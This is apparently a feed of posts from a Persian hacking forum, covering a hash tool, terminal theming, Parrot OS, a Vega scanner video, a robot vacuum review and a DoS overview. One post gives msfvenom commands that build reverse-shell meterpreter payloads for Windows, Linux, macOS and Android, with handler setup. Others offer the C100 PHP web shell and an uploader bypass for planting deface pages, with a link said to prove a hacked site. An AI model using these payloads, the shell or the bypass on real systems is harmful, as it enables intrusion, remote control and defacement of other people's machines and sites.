    با سلام خدمت شما دوستان عزیز انجمن تیم امنیتی گاردایران با یک ابزار در خدمتتون هستیم . Mr.Hasher نویسنده نسخه PHP‌: @MR.MSA نویسنده نسخه C# : @HCSH4C39 نحوه استفاده : امروز می خوام یه ابزار رو ارائه بدم که شما یک متن رو میدید بهش و برای شما به انواع هش ها هش میکنه . نسخه : این برنامه در دو نسخه php و c# ارائه می شود که php تحت وب و c# قابلیت اجرایی exe (تحت ویندوز) هست . نوع هش ها : در نسخه php MD5 MD4 MD2 SHA1 SHA224 SHA256 SHA384 SHA512 SHA3-224 SHA3-256 SHA3-384 SHA3-512 RIPEMD-128 RIPEMD-160 RIPEMD-256 RIPEMD-320 FNV132 FNV1A64 FNV164 FNV1A32 HAVAL-128,3 HAVAL-160,3 HAVAL-192,3 HAVAL-224,3 HAVAL-256,3 HAVAL-128,4 HAVAL-160,4 HAVAL-192,4 HAVAL-224,4 HAVAL-256,4 HAVAL-128,5 HAVAL-160,5 HAVAL-192,5 HAVAL-224,5 HAVAL-256,5 TIGER-128,3 TIGER-160,3 TIGER-192,3 TIGER-128,4 TIGER-160,4 TIGER-192,4 ADLER-32 CONVERTUUENCODE GOST JOAAT CRC32C CRC32B CRC32 SNEFRU WHIRLPOOL BASE64 HEX ASCII در نسخه C# MD5 SHA 160 SHA 256 SHA 384 SHA 512 RIPEMD 160 لینک های مهم : 1- GitHub 2- Demo Online موفق و پیروز باشید .
  13. با سلام خدمت دوستان عزیز گاردایران . من توی کانال های مختلف هک ، لینوکس ، برنامه نویسی .. هستم و بعضی ها رو می بینم که تم ترمینالشون رو عوض می کنن که خیلی جذابیت می ده به کار ما هکر ها . پس منم رفتم نحوه تغییر تم رو یاد گرفتم ، توی انجمن که گشتم چنین پستی نبود ، پس گفتم اموزشش رو بزارم . خب ابتدا دستورات زیر به ترتیب می زنید : > sudo apt install figlet > sudo apt install lolcat > sudo apt install gem > sudo apt install ruby Figlet : برای اینکه بتونیم یک متن رو به صورت بزرگ برای مثال Mr.MSA رو زمانی که ترمینال باز می شود نمایش دهیم از figlet استفاده می کنیم . که فونت های مختلف در اینجا موجود است. lolcat : برای اینکه به متن خودمون رو به صورت رندم رنگ هایی رو بدیم از lolcat استفاده می کنیم . Gem & Ruby : پیشنیاز های lolcat . حالا برای اینکه بتونیم از lolcat استفاده کنیم از این دستور استفاده می کنیم : gem install lolcat و برای اینکه سیستم ابزار ها رو بشناسه از این دستور استفاده کنید : sudo apt update ---------------------------------------------------------------------------------------------------------------- خب حالا شما با دستور زیر می تونید متن خودتون رو بصورت بنر و رنگ های رندم نمایش دهید : figlet MR.MSA | lolcat خب حالا می خواهیم برای همیشه زمانی که ترمینال رو باز می کنیم این متن رو نمایش بده . ابتدا oh my zsh رو نصب کنید : نصب با curl : sh -c "$(curl -fsSL [Hidden Content])" نصب با wget : sh -c "$(wget [Hidden Content] -O -)" نصب با github : [Hidden Content] نصب تم در zsh : بعد از نصب zsh شما ابتدا این دستور رو می زنید : cd ~ بعد این دستور برای ادیت کردن فایل .zshrc vim .zshrc در اون فایل دنبال این کلمه بگردید : ZSH_THEME="robbyrussell" اون کلمه ای که بین " است نام تم zsh هست که به صورت پیش فرض robbyrussell هست . برای تغییر دادنش شما باید به این ادرس بروید : [Hidden Content] و بر اساس عکس هایی که گذاشته شده نام تم رو انتخاب کنید و در این قسمت قرار دهید : ZSH_THEME=" نام تم مورد نظر " نمایش بنر دلخواه با رنگ رندم : برای اینکار در همان فایل .zshrc در خط اخر این دستور رو بزاید : figlet 'Mr.MSa' | lolcat و به جای Mr.MSA متن مورد نظر خودتون رو بنویسید . حالا این کلید ها رو به ترتیب روی کیبورد برای خارج شدن از ادیتور vim و سیو کردنش فشار دهید : 1) esc 2) : 3) w 4) q حالا در قسمت edit profile ترمینال در قسمت کامند شل پیش فرض که bash هست رو به zsh تغییر بدید یعنی : /bin/bash به این تغییر می کنه : /bin/zsh حالا یک بار از ترمینال خارج بشید و دوباره ترمینال رو باز کنید و مشاهده می کنید که ترمینال شما نسبت به روز اول زیبا تر شده است . و می توانید با دستورات zsh چیز های دیگه هم بزارید یا حتی همین دستور رو چند بار دیگه بنویسید با متن های مختلف . این یه فایل PDF آموزشی است که دوست عزیز دیفیسرمون HCSH4C39 نوشته که می تونید به همراه این تاپیک از این آموزش هم استفاده کنید : HCSH4C39.pdf موفق و پیروز باشید .
  14. mownten

    معرفی رقیب جدید کالی، Parrot 3.9 Intruder

    با سلام خدمت دوستان عزیز امروز با سیستم عامل جدیدی آشنا شدیم به نام Parrot 3.9 GNU/Linux (کلمه Parrot یعنی طوطی) که یک پلتفرم مبتنی بر Debian هست. این سیستم عامل، ابزار حرفه ای برای تست نفوذ، توسعه نرم افزار و حفاظت از حریم خصوصی رو در خودش جا داده و میشه گفت که یک توزیع مربوط به هک اخلاقی (Ethical Hacking) و تست نفوذ با ویژگی های جدید می باشد: لینک ها: صفحه اصلی انجمن پروت دانلود توی صفحه دانلود با سه نوع مختلفی از بیلد های سیستم عامل مواجه می شید که بطور خلاصه دربارش توضیح میدم: یک : Full (security) mode : نسخه فول این سیستم عامل بقول سازنده یک محیط جامع در خصوص تست نفوذ، حریم خصوصی، مهندسی معکوس، توسعه نرم افزار، جمع اوری اطلاعات و غیره هست. نسخه های 32 بین و 64 بیت با فرمت ISO در صفحه دانلود موجود هست. دو: Lite (Home/Workstation) mode : این بیلد نسخه ی سبک سیستم عامل برای استفاده روزانه و حفاظت از حریم خصوصی منتشر شده و بیشتر مدنظر کاربران عادی خواهد بود. در صفحه دانلود جدول مقایسه ای ویژگی های نسخ مختلف این سیستم عامل رو میتونید ببینید.تصاویری از سیستم عامل:
  15. با سلام آموزش تصویری کار با اسکنر قدرتمند Vega رو در کالی لینوکس برای شما ضبط کردم و فیلم بهمراه توضیحات هست و از این اسکنر برای اسکن آسیب پذیری تارگت( ُScanner Target Vulnerability ) می تونید استفاده کنید .این اسکنر یکی از بهترین اسکنر های رایکان برای تشخیص اسیب پذیری های شناخته شده هست و 100 در 100 به افزایش امنیت سایت های شما کمک میکنه.... امیدوارم که از این اموزش نهایت استفاده رو ببرید پسورد : guardiran.org VEGA Scanner Kali Linux.rar
  16. درود ../ با آموزش بایپس انواع آپلودر در خدمتتون هستیم در این روش ما دیفیس پیج خودمون رو به سادگی آپلود میکنیم خیلی از سرویس دهندگان آپلودر این باگ رو دارن باگ توسط اعضای تیم امنیتی گارد ایران کشف شده (MR.IMAN , Reza.Attacker , 1TED) کلیپ در دو پارت تقسیم بندی شده رمز فایل فشرده: guardiran.org لینک اثبات یکی از سایت های هک شده با این روش [Hidden Content] یا حـ ـق ../ 22-07-2016 01-21-51 ب-ظ.part1.rar 22-07-2016 01-21-51 ب-ظ.part2.rar
  17. سلام هک سیستم عامل ها از طریق کالی کد ها: ویندوز: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip khodetoon> LPORT=<porti k forward kardin> -f exe > 504w.exe لینوکس: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<ip khodetoon> LPORT=<port> -f elf > 504w.elf مک: msfvenom -p osx/x86/shell_reverse_tcp LHOST=<ip khodetoon> LPORT=<Your Port to Connect On> -f macho > 504w.macho اندروید: msfvenom -p android/meterpreter/reverse_tcp LHOST=ip khodetoon R >/root/504w.apk مناسب با تارگتتون کد رو انتخاب کنین و در اخر هندلر ها رو تنظیم کنین use exploit/multi/handler set PAYLOAD <Payload name> set LHOST <LHOST value> set LPORT <LPORT value> set ExitOnSession false exploit
  18. پنج روبات نظافتچی که خانه دار ها را شيفته خود مي کنند اين خبر مخصوص آنهايي است که هر روز مجبورهستند خانه خود را نظافت کنند.يکي از سخت ترين و عذاب‌آورترین کارهاي خانه بدون شک تميز کردن کف آن است.این کار برای بانوان بسیار سخت است زیرا با کمردرد و خستگی زیاد همراه است ولی در ادامه به معرفی پنج روبات نظافتچی که خانم‌ها عاشق آن‌ها خواهند شد خواهیم پرداخت. این دستگاه‌ها دارای قیمت‌های متنوع و خدمات متفاوتی هستند ولی وجهه مشترک همه آن‌ها، هوشمند بودن ابزار و قدرت بالای نظافت آن‌هاست. این دستگاه‌ها همگی قابلیت تمیز کردن سطوح صاف را دارند و بر اساس مدل، می‌توانند سطوح مختلفی را تمیز نمایند و همین امر موجب شده است تا کاربری آن‌ها برای افراد و مکان‌های مختلف، متنوع باشد. این دستگاه‌ها قیمت‌های متنوعی دارند و از 250 تا 600 دلار، قیمت داشته باشند و همین امر انتخاب را برای افراد مختلف، ساده خواهد نمود، البته به آقایان پیشنهادی می‌کنیم که اجازه ندهند همسرانشان این مقاله را مطالعه نمایند. این دستگاه‌ها همگی از منبع تغذیه داخلی استفاده می‌کنند و با کمک باتری به کار کردن ادامه می‌دهند و همین امر نزی موجب آزادی عمل آن‌ها خواهد شد. این دستگاه‌ها به‌سادگی می‌توانند مسیر حرکتی خود را بیابند و در میان اشیاء مختلف موجود در خانه مانور داده و گوشه‌ و کنارهای خانه را تمیز نمایند. حتی در برخی موارد، این دستگاه‌ها قابلیت تنظیم زمان‌بندی دارند و در زمان خاصی می‌توانند به‌طور خودکار شروع به کار کردن و نظافت کنند. iRobot Braava 380t این مدل با قیمت 300 دلاری خود، شاید بهترین گزینه ممکن دز این لیست باشد و شاید بتوان آن را دقیق‌ترین دستگاه میان تمامی مدل‌های موجود در بازار دانست. این مدل می‌تواند تقریبا تمامی اشغال‌های موجود بر روی زمین را جمع‌آوری نماید و به همین دلیل نیز داشتن این دستگاه کاملا به‌صرفه به نظر می‌رسد. این دستگاه در رده قیمتی و قدرتی، وسوسه‌برانگیزترین دستگاه موجود در بازار به نظر می‌رسد. البته معایبی نیز در این دستگاه وجود دارد که می‌توان مهم‌ترین آن‌ها را عدم امکان برنامه‌ریزی دستگاه برای کارکرد اتوماتیک دانست. iRobot Scooba 450 در حالی که بیشتر مدل‌های موجود در میان تمیزکنندگان زمین، برای فعالیت‌های سبک طراحی‌شده‌اند، می‌توان این مدل را به‌عنوان یک استثنا به‌حساب آورد زیرا این دستگاه به‌خوبی می‌تواند محیط‌های بسیار کثیف و زمین‌ پر از آشغال را تمیز کند. البته این امکانات، هزینه بالایی نیز خواهد داشت و برای خرید آن باید بین نزدیک به 600 دلار هزینه نمایید. از معایب این مدل نیز می‌توان به مدت کارکرد باتری آن اشاره نمود که با دو ساعت شارژ شدن، تنها می‌تواند به مدت 40 دقیقه به کار کردن ادامه بدهد. Moneual Rydis H67 این دستگاه 400 دلاری می‌تواند به تمامی گوشه و کنارهای خانه شما سر بزند و طراحی آن نیز به نحوی انجام‌شده است که با دیدن آن، حس نخواهید کرد که یک محصول عجیب در وسط خانه قرار گرفته است، شاید بتوان این طراحی را بسیار شبیه به دیسکمن‌های قدیمی دانست، البته در ابعادی به‌مراتب بزرگ‌تر. این مدل به صورتی طراحی‌شده است که می‌تواند در محیط‌ها و سطوح مختلف، به‌خوبی کار کند و به همین دلیل نیز کاربرد آن، برای شرکت‌ها و خانه‌ها به یک اندازه مفید خواهد بود. البته معایب این دستگاه نیز قابل‌چشم‌پوشی نیستند، این مدل در بسیاری از موارد با گیرکردن برس تمیزکننده در طول کار روبرو می‌شود و شاید بتوان قیمت آن را نیز کمی بالاتر از سطح معمول برای دستگاه‌های این‌چنینی محسوب نمود. Techko Maid Smart Maid RS118 شاید بتوان این مدل را با توجه به محاسبه قیمت، به‌عنوان یکی از مولفه‌های موثر در ارزش‌گذاری، یکی از برترین‌های جهان محسوب نمود، این دستگاه با توانایی‌های متعدد خود می‌تواند برای هر خانه و اداره‌ای یک گزینه ایده آل محسوب گردد، قیمت این مدل در بازار جهانی برابر با 148 دلار برای مدل پایه و 250 دلار برای پیشرفته‌ترین مدل است. از مزایای این دستگاه می‌توان به ساده بودن کار کردن با رابط کاربری آن اشاره نمود، این دستگاه را می‌توان خیلی راحت برنامه‌ریزی کرد و همین امر کارکرد خانگی آن را قوت بخشیده است. همچنین می‌توان به طراحی ویژه عملکرد دستگاه اشاره نمود که در دو نوع کارکرد، قابل برنامه‌ریزی است که برای محیط‌های مختلف قابل‌استفاده است و نوع کارکرد برس تمیزکننده را بر اساس سطحی که قرار است تمیز کند، تغییر خواهد داد. Yujin Robot iClebo Arte این ابزار مفید می‌تواند کمک بزرگی به نظافت خانه باشد، این دستگاه که از طراحی بسیار زیبایی نیز بهره‌ می‌برد، می‌تواند در هر خانه و محیط کاری مفید باشد ولی در موارد مصرف این دستگاه، تعدادی از کاربران به بد بودن کیفیت تعدادی از دستگاه‌های تولیدشده اشاره کرده‌اند که می‌تواند یک نکته منفی درباره این محصول به‌حساب بیاید ولی در زمینه‌های دیگر باید گفت که این دستگاه مزایای فراوانی نیز دارد. Yujin Robot iClebo Arte، بسیار بی‌صدا عمل می‌کند و همین امر را شایید بتوان بزرگ‌ترین مزیت آن دانست، همچنین می‌توان از این دستگاه در سطوح مختلف استفاده نمود و این محصول 500 دلاری می‌تواند یکی از گزینه‌های مطلوب برای اداره‌ها محسوب شود.
  19. با سلام و درود یک مقاله با عنوان : هک رو از کجا شروع کنم؟ تو این مقاله یادمیگیرید که هک چیه ؟ و هک رو از کجا شروع کنید و .... مقاله رو ببینید ! امیدوارم خوشتون بیاد موفق و پیروز باشید start-hacking.pdf
  20. kingdeface

    C100 PHP Shell

    Shell C100 پسورد فایل : guardiran.org . C100 Shell.rar
  21. kingdeface

    انواع و بررسی حملات DOS - DDOS

    DOS Attack متداول ترین و مشهورترین نوع حملات Dos ، زمانی تحقق می یابد که یک مهاجم اقدام به ایجاد یک سیلاب اطلاعاتی می کند و وقتی که دیتای زیادی درشبکه درحال انتقال می باشد امکان حمله داس بیشتر خواهد شد . زمانی که شما آدرس URL یک وب سایت خاص را ا زطریق مرور گر خود تایپ می نمایید درخواست شما برای سرویس دهنده ارسال می گردد و سرویس دهنده هرلحظه قادربه پاسخگویی به حجم محدودی از درخواست ها می باشد ، بنابراین اگریک مهاجم با ارسال درخواستهای متعدد و سیلاب گونه باعث افزایش حجم عملیات سرویس دهنده گردد ، قطعا امکان پردازش درخواست شما برای سرویس دهنده وجود نخواهد داشت . حملات فوق از نوع DOS می باشند ، چرا که امکان دستیابی شما به سایت مورد نظر سلب شده است و یک مهاجم می تواند با ارسال پیام های الکتریکی ناخواسته که ازآن با نام Spam یاد می شود حملات مشابهی رامتوجه سرویس دهنده پست الکترونیک نماید. هر account پست الکترونیک (صرف نظر از منبعی که آنان را دراختیارشما قرارمی دهد، نظیر سازمان مربوطه ویا سرویسهای رایگانی نظیر یاهو دارای ظرفیت محدودی می باشند) پس از تکمیل ظرفیت فوق ، عملا " امکان ارسال Email دیگری به account فوق وجود نخواهد داشت و مهاجمان با ارسال نامه های الکترونیکی ناخواسته سعی می نمایند که ظرفیت account مورد نظر را تکمیل و عملا" امکان دریافت email های معتبر را از account فوق سلب نمایند . حملات Dos هزینه بالایی دارند و این حملات می توانند از یک شبکه محلی یا از بیرون شبکه شروع شوند و نیز یک حمله Dos را از طریق تلاش آشکار حمله کننده برای جلوگیری از استفاده کاربران قانونی یک سرویس از آن سرویس ، شناسایی می کنند. ازجمله این تلاش ها می توان به موارد زیر اشاره کرد: * انواع طغیانهای شبکه شامل طغیان های TCP , UDP : وICMP که ترافیک قانونی سایت را مختل می کند. * تلاش در جهت قطع ارتباط دو ماشین ودر نتیجه عدم امکان استفاده ازسرویس آنها. * تلاش در جهت ممانعت از دسترسی فردی خاص به یک سرویس . * تلاش برای خرابکاری در ارائه سرویس به سیستم یا شخص خاصی. از دیدگاه فنی ، حملات DOS به دو دسته زیر تقسیم می شوند : ** حمله ای که مستقیما منجر به توقف سرویس های ماشین می شود . ** حمله ای که منجر به اشباع یک سرویس دهنده و تلف شدن منابع آن شود. .
×
×
  • ایجاد مورد جدید...